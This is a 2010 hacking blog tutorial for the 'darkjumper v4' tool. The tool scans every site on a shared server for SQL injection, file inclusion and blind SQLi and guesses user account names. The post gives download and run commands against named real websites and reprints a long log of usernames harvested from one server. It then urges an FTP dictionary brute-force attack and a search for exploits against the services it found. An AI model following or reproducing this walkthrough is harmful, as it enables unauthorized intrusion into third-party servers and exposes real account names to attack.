DARKJUMPER V.4 BY MYWISDOM + USER ENUMERATIONS

Tool name: darkjumper version 4.0
C0d3r: mywisdom (solhack 2004 c0d3r)
Released on: February 2010
Download url:
http://yoyoparty.com/upload/darkjumper.tgz

mirror:

http://fams-online.com/images/darkjumper.tgz

Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
Additional feature: 30 fake http user agent(s)

Requirement(s): python > 2.5.x, perl

Ok introducing my new upgraded tool called darkjumper version 4.0. Ok here's a little tutorial about "Using Darkjumper"
This tool can run on linux and windows.

Tutorial for Linux Environment (command line)

Ok u may download this tool and then extract it

view source
print?

1
wget http://fams-online.com/images/darkjumper.tgz

2
tar zxvf darkjumper.tgz
Then go to folder darkjumper:

view source
print?

1
cd darkjumper;ls -la
Here's the view from my b0x:

view source
print?

01
bt next_steps # cd darkjumper

02
bt darkjumper # ls -la

03
total 872

04
drwxr-xr-x  2 turkmentel root   4096 Feb  6 00:38 ./

05
drwxrwxrwx 11 root       root   4096 Oct  2 01:19 ../

06
-rwxrwxrwx  1 turkmentel 1001   1727 Feb  5 18:16 cgilist*

07
-rwxrwxrwx  1 root       root    485 Jun  8  2009 clearlog.py*

08
-rwxrwxrwx  1 turkmentel 1001   1263 Oct 27 21:58 darkcgi.pl*

09
-rwxrwxrwx  1 root       root  35840 Feb  6 00:28 darkjumper.py*

10
-rwxrwxrwx  1 root       root      9 Feb  6 00:37 darkjumperlog.txt*

11
-rwxrwxrwx  1 root       root  23128 Feb  5 17:29 devilzc0de.py*

12
-rwxrwxrwx  1 root       root  57154 Jun  8  2009 shot1.jpg*

13
-rwxrwxrwx  1 root       root 141527 Jun  8  2009 shot2.jpg*

14
-rwxrwxrwx  1 root       root 255572 Jun  8  2009 shot3.jpg*

15
-rwxrwxrwx  1 root       root 188846 Jun  8  2009 shot4.jpg*

16
-rwxrwxrwx  1 root       root 101075 Jun  8  2009 shot5.jpg*

17
-rwxrwxrwx  1 root       root   4876 Jun  8  2009 subscan.py*

18
-rwxrwxrwx  1 root       root   5254 Jun  8  2009 subscan2.py*

19
-rwxrwxrwx  1 root       root   5641 Jun  8  2009 tes.py*

20
-rwxrwxrwx  1 root       root   5641 Jun  8  2009 tes2.py*

21
bt darkjumper #
on that folder u will see these important file(s) for running darkjumper:
clearlog.py
Everytime before u run your darkjumper.py you must clear the log (don't forget about this) to make darkjumper.py works perfectly !!

type this:

view source
print?

1
./clearlog.py
or : python clearlog.py
darkjumper.py

Here is your main tool.

Ok then you are ready to run darkjumper.py, let's have a try by typing:

view source
print?

1
./darkjumper.py
And here's the view from my b0x:


Ok let's see what's the function of this tool, just type this to view help :

view source
print?

1
./darkjumper.py -help
Ok here's the help view from my b0x:


Ok from the help,We may run this tool using this ways

view source
print?

1
Usage:./darkjumper.py -t www.target_web.com -m mode
confuse??? don't be bro ! it's so easy!

ok let me give you sample:
Actually this tool has 3 mode, here they are:
1. surface scan

This is faster than full scan, only scan for: sqli and blind sqli on every site(s) at the same server
2. full scan

This will scan for cgi, path, lfi,rfi,sqli and blind sqli (will takes long time)  on every site(s) at the same server

3. enum scan

This is for guessing user(s) on that server, then u may use ssh,ftp or telnet dict attack depends on what daemon(s) are running on ur target
Ok here's the explanation(s) on each scan mode:
SURFACE SCANNING MODE
surface scanning will scan all site at the same server for sqli and blind sqli only.
Sample how to use this scanning using command line :

view source
print?

1
./darkjumper.py -t liquid-security.net -m surface
and then it will start to scan all site(s) at the same server as liquid-security.net

sorry just sample only ok?? I don't attack liquid-security and I don't suggest u ppl to attack it !!!
FULL SCANNING MODE
full scan will combine all basic attack(s) such as: sqli, blind sqli, lfi, and rfi on every site(s) at the same server.

Sample how to use this scanning using command line :

view source
print?

1
./darkjumper.py -t liquid-security.net -m full
only site sample ok???
USER ENUMERATION MODE
This is for guessing username(s) on that server. Why this is important??

once u get list of user(s) of that server, u may start to dict attack on one of the service.
ok let's have a try on a sample site and start guessing username based on 8 chars that we get from site name(s) on that server:

view source
print?

1
./darkjumper.py -t www.palapastudio.com -m enum 8
then just wait and the result may be viewed at darkjumperlog.txt
this mode guessing is available from 4-8 chars

if you wanna try 4 chars guessing:

view source
print?

1
./darkjumper.py -t www.palapastudio.com -m enum 4
if you wanna try 5 chars guessing:

view source
print?

1
./darkjumper.py -t www.palapastudio.com -m enum 5
if you wanna try 6 chars guessing:

view source
print?

1
./darkjumper.py -t www.palapastudio.com -m enum 6
if you wanna try 7 chars guessing:

view source
print?

1
./darkjumper.py -t www.palapastudio.com -m enum 7
warning !!! not all server setting permit user enumerations, but don't worry this tool will first check whether user enumeration is possible or not by testing

like this: www.yourtarget.com/~root

if the result is forbidden then it's a sign that u may try user enumeration there. But if 404 not found, u can't do user enumeration there
Ok here's the sample of view:


Ok from the scanning log at darkjumperlog.txt i got this:

view source
print?

001
----------------------------------------

002
W00t !!! found possible user: mclemore

003
Check this out:http://www.palapastudio.com/~mclemore

004
----------------------------------------

005
W00t !!! found possible user: getgoliv

006
Check this out:http://www.palapastudio.com/~getgoliv

007
----------------------------------------

008
W00t !!! found possible user: dreampop

009
Check this out:http://www.palapastudio.com/~dreampop

010
----------------------------------------

011
W00t !!! found possible user: snjegoti

012
Check this out:http://www.palapastudio.com/~snjegoti

013
----------------------------------------

014
W00t !!! found possible user: artafric

015
Check this out:http://www.palapastudio.com/~artafric

016
----------------------------------------

017
W00t !!! found possible user: emergedc

018
Check this out:http://www.palapastudio.com/~emergedc

019
----------------------------------------

020
W00t !!! found possible user: kevinrei

021
Check this out:http://www.palapastudio.com/~kevinrei

022
----------------------------------------

023
W00t !!! found possible user: gadgetco

024
Check this out:http://www.palapastudio.com/~gadgetco

025
----------------------------------------

026
W00t !!! found possible user: wallpape

027
Check this out:http://www.palapastudio.com/~wallpape

028
----------------------------------------

029
W00t !!! found possible user: sadewase

030
Check this out:http://www.palapastudio.com/~sadewase

031
----------------------------------------

032
W00t !!! found possible user: vidagasd

033
Check this out:http://www.palapastudio.com/~vidagasd

034
----------------------------------------

035
W00t !!! found possible user: shonenwa

036
Check this out:http://www.palapastudio.com/~shonenwa

037
----------------------------------------

038
W00t !!! found possible user: earnforc

039
Check this out:http://www.palapastudio.com/~earnforc

040
----------------------------------------

041
W00t !!! found possible user: satishco

042
Check this out:http://www.palapastudio.com/~satishco

043
----------------------------------------

044
W00t !!! found possible user: ahlihost

045
Check this out:http://www.palapastudio.com/~ahlihost

046
----------------------------------------

047
W00t !!! found possible user: hostingd

048
Check this out:http://www.palapastudio.com/~hostingd

049
----------------------------------------

050
W00t !!! found possible user: albrowma

051
Check this out:http://www.palapastudio.com/~albrowma

052
----------------------------------------

053
W00t !!! found possible user: futurest

054
Check this out:http://www.palapastudio.com/~futurest

055
----------------------------------------

056
W00t !!! found possible user: lamavine

057
Check this out:http://www.palapastudio.com/~lamavine

058
----------------------------------------

059
W00t !!! found possible user: vukkarad

060
Check this out:http://www.palapastudio.com/~vukkarad

061
----------------------------------------

062
W00t !!! found possible user: stxsummi

063
Check this out:http://www.palapastudio.com/~stxsummi

064
----------------------------------------

065
W00t !!! found possible user: cocorost

066
Check this out:http://www.palapastudio.com/~cocorost

067
----------------------------------------

068
W00t !!! found possible user: egodrive

069
Check this out:http://www.palapastudio.com/~egodrive

070
----------------------------------------

071
W00t !!! found possible user: agesmart

072
Check this out:http://www.palapastudio.com/~agesmart

073
----------------------------------------

074
W00t !!! found possible user: destilac

075
Check this out:http://www.palapastudio.com/~destilac

076
----------------------------------------

077
W00t !!! found possible user: mediaban

078
Check this out:http://www.palapastudio.com/~mediaban

079
----------------------------------------

080
W00t !!! found possible user: gestionb

081
Check this out:http://www.palapastudio.com/~gestionb

082
----------------------------------------

083
W00t !!! found possible user: tw6cn

084


085
Check this out:http://www.palapastudio.com/~tw6cn

086


087
----------------------------------------

088
W00t !!! found possible user: imolacar

089
Check this out:http://www.palapastudio.com/~imolacar

090
----------------------------------------

091
W00t !!! found possible user: conimpex

092
Check this out:http://www.palapastudio.com/~conimpex

093
----------------------------------------

094
W00t !!! found possible user: asikomus

095
Check this out:http://www.palapastudio.com/~asikomus

096
----------------------------------------

097
W00t !!! found possible user: karatesa

098
Check this out:http://www.palapastudio.com/~karatesa

099
----------------------------------------

100
W00t !!! found possible user: buyastro

101
Check this out:http://www.palapastudio.com/~buyastro

102
----------------------------------------

103
W00t !!! found possible user: alwelaya

104
Check this out:http://www.palapastudio.com/~alwelaya

105
----------------------------------------

106
W00t !!! found possible user: jokemast

107
Check this out:http://www.palapastudio.com/~jokemast

108
----------------------------------------

109
W00t !!! found possible user: fantasyc

110
Check this out:http://www.palapastudio.com/~fantasyc

111
----------------------------------------

112
W00t !!! found possible user: lilamitr

113
Check this out:http://www.palapastudio.com/~lilamitr

114
----------------------------------------

115
W00t !!! found possible user: wraorgpk

116
Check this out:http://www.palapastudio.com/~wraorgpk

117
----------------------------------------

118
W00t !!! found possible user: renartfi

119
Check this out:http://www.palapastudio.com/~renartfi

120
----------------------------------------

121
W00t !!! found possible user: awtohost

122
Check this out:http://www.palapastudio.com/~awtohost

123
----------------------------------------

124
W00t !!! found possible user: baumulle

125
Check this out:http://www.palapastudio.com/~baumulle

126
----------------------------------------

127
W00t !!! found possible user: apunkawo

128
Check this out:http://www.palapastudio.com/~apunkawo

129
----------------------------------------

130
W00t !!! found possible user: hostingn

131
Check this out:http://www.palapastudio.com/~hostingn

132
----------------------------------------

133
W00t !!! found possible user: facetint

134
Check this out:http://www.palapastudio.com/~facetint

135
----------------------------------------

136
W00t !!! found possible user: mycustom

137
Check this out:http://www.palapastudio.com/~mycustom

138
----------------------------------------

139
W00t !!! found possible user: alternat

140
Check this out:http://www.palapastudio.com/~alternat

141
----------------------------------------

142
W00t !!! found possible user: kuwait2d

143
Check this out:http://www.palapastudio.com/~kuwait2d

144
----------------------------------------

145
W00t !!! found possible user: snetindi

146
Check this out:http://www.palapastudio.com/~snetindi

147
----------------------------------------

148
W00t !!! found possible user: getgotec

149
Check this out:http://www.palapastudio.com/~getgotec

150
----------------------------------------

151
W00t !!! found possible user: khaslomb

152
Check this out:http://www.palapastudio.com/~khaslomb

153
----------------------------------------

154
W00t !!! found possible user: soccerfu

155
Check this out:http://www.palapastudio.com/~soccerfu

156
----------------------------------------

157
W00t !!! found possible user: balitrad

158
Check this out:http://www.palapastudio.com/~balitrad

159
----------------------------------------

160
W00t !!! found possible user: getgopix

161
Check this out:http://www.palapastudio.com/~getgopix

162
----------------------------------------

163
W00t !!! found possible user: paisleyc

164
Check this out:http://www.palapastudio.com/~paisleyc

165
----------------------------------------

166
W00t !!! found possible user: goiashos

167
Check this out:http://www.palapastudio.com/~goiashos

168
----------------------------------------

169
W00t !!! found possible user: i3hnet

170


171
Check this out:http://www.palapastudio.com/~i3hnet

172


173
----------------------------------------

174
W00t !!! found possible user: dasimpla

175
Check this out:http://www.palapastudio.com/~dasimpla

176
----------------------------------------

177
W00t !!! found possible user: buahmera

178
Check this out:http://www.palapastudio.com/~buahmera
So we may decide these are username(s) on that server:

buahmera,dasimpla, i3hnet, goiashos, paisleyc,and so on...bla bla bla  oopssss so many user(s) we got!!!
So let's try to scan this server to find what service(s) are running:




Ok seems like the easy way is using:

 21/tcp    open   ftp             PureFTPd
u may use ftp dict attack by gunslinger :
[url]http://www.darkc0de.com/others/ftpbrute.py[/url]
(dont's forget to prepare word list(s))
note:

from the scanning we also see some other daemon(s) information, u may try to find whether there are already found bug(s) or sploit(s)

try to googling,it's better if u find a non famous daemon then try to find the source code from the vendor and analyze the source code line by line
Additional Note(s):

1. If darkjumper looks stuck after a long scan try to press: ctrl+c

2. If u feel that the scanning is enough, you may press  ctrl+z to stop it

3. To see scanning result(s) u may read darkjumperlog.txt -> here's the log of your scan


By :http://wisdomc0d3.wordpress.com/2010/02/05/darkjumper-v-4-by-mywisdom-user-enumerations/